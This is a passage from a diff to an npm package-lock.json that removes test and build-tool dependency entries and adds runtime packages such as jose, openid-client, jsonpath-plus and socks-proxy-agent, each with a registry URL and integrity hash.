"https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true, - "engines": { - "node": ">=6.0.0" + "node_modules/isomorphic-ws": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", + "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", + "peerDependencies": { + "ws": "*" } }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true + "node_modules/jose": { + "version": "6.0.11", + "resolved": "https://registry.npmjs.org/jose/-/jose-6.0.11.tgz", + "integrity": "sha512-QxG7EaliDARm1O1S8BGakqncGT9s25bKL1WSf6/oa17Tkqwi8D2ZNglqCF+DsYF88/rV66Q/Q2mFAy697E1DUg==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/panva" + } }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, + "node_modules/js-yaml": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", + "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", "dependencies": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" + "argparse": "^2.0.1" + }, + "bin": { + "js-yaml": "bin/js-yaml.js" } }, - "node_modules/@jridgewell/trace-mapping/node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true + "node_modules/jsbn": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "license": "MIT" }, - "node_modules/@kubernetes/client-node": { - "version": "0.19.0", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.19.0.tgz", - "integrity": "sha512-WTOjGuFQ8yeW3+qD6JrAYhpwpoQbe9R8cA/61WCyFrNawSTUgLstHu7EsZRYEs39er3jDn3wCEaczz+VOFlc2Q==", - "dependencies": { - "@types/js-yaml": "^4.0.1", - "@types/node": "^20.1.1", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tslib": "^2.4.1", - "ws": "^8.11.0" - }, - "optionalDependencies": { - "openid-client": "^5.3.0" + "node_modules/jsep": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", + "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", + "license": "MIT", + "engines": { + "node": ">= 10.16.0" } }, - "node_modules/@kubernetes/client-node/node_modules/@types/node": { - "version": "20.8.10", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.8.10.tgz", - "integrity": "sha512-TlgT8JntpcbmKUFzjhsyhGfP2fsiz1Mv56im6enJ905xG1DAYesxJaeSbGqQmAw8OWPdhyJGhGSQGKRNJ45u9w==", + "node_modules/jsonpath-plus": { + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", + "license": "MIT", "dependencies": { - "undici-types": "~5.26.4" + "@jsep-plugin/assignment": "^1.3.0", + "@jsep-plugin/regex": "^1.0.4", + "jsep": "^1.4.0" + }, + "bin": { + "jsonpath": "bin/jsonpath-cli.js", + "jsonpath-plus": "bin/jsonpath-cli.js" + }, + "engines": { + "node": ">=18.0.0" } }, - "node_modules/@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } + "node_modules/lodash": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", + "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" }, - "node_modules/@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, + "node_modules/matcher": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/matcher/-/matcher-5.0.0.tgz", + "integrity": "sha512-s2EMBOWtXFc8dgqvoAzKJXxNHibcdJMV0gwqKUaw9E2JBJuGUK7DrNKrA6g/i+v72TT16+6sVm5mS3thaMLQUw==", + "license": "MIT", "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" + "escape-string-regexp": "^5.0.0" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" + "node_modules/math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "license": "MIT", + "engines": { + "node": ">= 0.4" } }, - "node_modules/@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==" - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "dependencies": { - "@types/node": "*" + "node_modules/mime-db": { + "version": "1.52.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", + "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", + "license": "MIT", + "engines": { + "node": ">= 0.6" } }, - "node_modules/@types/ip-address": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/@types/ip-address/-/ip-address-7.0.0.tgz", - "integrity": "sha512-OyDm4EwZsYPDUjXz3ktiuQE8PJIPO1uUZMfvZMcWmykWjm3WVyI78rAnHkqKV3pMR7iDRKfalI+RxG5JBDUo5w==", - "deprecated": "This is a stub types definition. ip-address provides its own type definitions, so you do not need this installed.", - "dev": true, + "node_modules/mime-types": { + "version": "2.1.35", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", + "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", + "license": "MIT", "dependencies": { - "ip-address": "*" + "mime-db": "1.52.0" + }, + "engines": { + "node": ">= 0.6" } }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "license": "MIT" }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" + "node_modules/mustache": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/mustache/-/mustache-4.2.0.tgz", + "integrity": "sha512-71ippSywq5Yb7/tVYyGbkBggbU8H3u5Rz56fH60jGFgr8uHwxs+aSKeqmluIVzM0m0kB7xQjKS6qPfd0b2ZoqQ==", + "bin": { + "mustache": "bin/mustache" } }, - "node_modules/@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, + "node_modules/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-C/fGU2E8ToujUivIO0H+tpQ6HWo4eEmchoPIoXtxCrVghxdKq+QOHqEZW7tuP3KlV3bC8FRMO5nMCC7Zm1VP6g==", "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" + "whatwg-url": "^5.0.0" + }, + "engines": { + "node": "4.x || >=6.0.0" + }, + "peerDependencies": { + "encoding": "^0.1.0" + }, + "peerDependenciesMeta": { + "encoding": { + "optional": true + } } }, - "node_modules/@types/js-yaml": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.5.tgz", - "integrity": "sha512-FhpRzf927MNQdRZP0J5DLIdTXhjLYzeUTmLAu69mnVksLH9CJY3IuSeEgbKUki7GQZm0WqDkGzyxju2EZGD2wA==" - }, - "node_modules/@types/lodash": { - "version": "4.14.195", - "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.195.tgz", - "integrity": "sha512-Hwx9EUgdwf2GLarOjQp5ZH8ZmblzcbTBC2wtQWNKARBSxM9ezRIAUpeDTgoQRAFB0+8CNWXVA9+MaSOzOF3nPg==", - "dev": true - }, - "node_modules/@types/mustache": { - "version": "4.2.6", - "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.2.6.tgz", - "integrity": "sha512-t+8/QWTAhOFlrF1IVZqKnMRJi84EgkIK5Kh0p2JV4OLywUvCwJPFxbJAl7XAow7DVIHsF+xW9f1MVzg0L6Szjw==", - "dev": true, - "license": "MIT" - }, - "node_modules/@types/node": { - "version": "16.18.38", - "resolved": "https://registry.npmjs.org/@types/node/-/node-16.18.38.tgz", - "integrity": "sha512-6sfo1qTulpVbkxECP+AVrHV9OoJqhzCsfTNp5NIG+enM4HyM3HvZCO798WShIXBN0+QtDIcutJCjsVYnQP5rIQ==" - }, - "node_modules/@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "node_modules/@types/request": { - "version": "2.48.8", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.8.tgz", - "integrity": "sha512-whjk1EDJPcAR2kYHRbFl/lKeeKYTi05A15K9bnLInCVroNDCtXce57xKdI0/rQaA3K+6q0eFyUBPmqfSndUZdQ==", - "dependencies": { - "@types/caseless": "*", - "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" + "node_modules/oauth4webapi": { + "version": "3.5.5", + "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.5.5.tgz", + "integrity": "sha512-1K88D2GiAydGblHo39NBro5TebGXa+7tYoyIbxvqv3+haDDry7CBE1eSYuNbOSsYCCU6y0gdynVZAkm4YPw4hg==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/panva" } }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/tough-cookie": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.2.tgz", - "integrity": "sha512-Q5vtl1W5ue16D+nIaW8JWebSSraJVlK+EthKn7e7UcD4KWsaSJ8BqGPXNaPghgtcn/fhvrN17Tv8ksUsQpiplw==" - }, - "node_modules/@types/ws": { - "version": "8.5.5", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.5.tgz", - "integrity": "sha512-lwhs8hktwxSjf9UaZ9tG5M03PGogvFaH8gUgLNbN9HKIg0dvv6q+gkSuJ8HN4/VbyxkuLzCjlN7GquQ0gUJfIg==", + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "license": "ISC", "dependencies": { - "@types/node": "*" + "wrappy": "1" } }, - "node_modules/@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, + "node_modules/openid-client": { + "version": "6.6.2", + "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.6.2.tgz", + "integrity": "sha512-Xya5TNMnnZuTM6DbHdB4q0S3ig2NTAELnii/ASie1xDEr8iiB8zZbO871OWBdrw++sd3hW6bqWjgcmSy1RTWHA==", + "license": "MIT", "dependencies": { - "@types/yargs-parser": "*" + "jose": "^6.0.11", + "oauth4webapi": "^3.5.4" + }, + "funding": { + "url": "https://github.com/sponsors/panva" } }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "node_modules/parse-domain": { + "version": "8.2.2", + "resolved": "https://registry.npmjs.org/parse-domain/-/parse-domain-8.2.2.tgz", + "integrity": "sha512-CoksenD3UDqphCHlXIcNh/TX0dsYLHo6dSAUC/QBcJRWJXcV5rc1mwsS4WbhYGu4LD4Uxc0v3ZzGo+OHCGsLcw==", + "license": "MIT", "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" + "is-ip": "^5.0.1" }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" + "bin": { + "parse-domain-update": "bin/update.js" } }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, + "node_modules/pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", + "license": "MIT", "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" + "end-of-stream": "^1.1.0", + "once": "^1.3.1" } }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true, + "node_modules/rfc4648": { + "version": "1.5.2", + "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.2.tgz", + "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==" + }, + "node_modules/smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", + "license": "MIT", "engines": { - "node": ">=8" + "node": ">= 6.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, + "node_modules/socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", + "license": "MIT", "dependencies": { - "color-convert": "^2.0.1" + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" }, "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" + "node": ">= 10.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, + "node_modules/socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", + "license": "MIT", "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" }, "engines": { - "node": ">= 8" + "node": ">= 14" } }, - "node_modules/argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "node_modules/asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", + "node_modules/socks/node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "license": "MIT", "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", - "engines": { - "node": ">=0.8" - } - }, - "node_modules/asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, "engines": { - "node": "*" + "node": ">= 12" } }, - "node_modules/aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" + "node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "license": "BSD-3-Clause" }, - "node_modules/babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, + "node_modules/stream-buffers": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", + "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" + "node": ">= 0.10.0" } }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, + "node_modules/streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" }, - "engines": { - "node": ">=8" + "optionalDependencies": { + "bare-events": "^2.2.0" } }, - 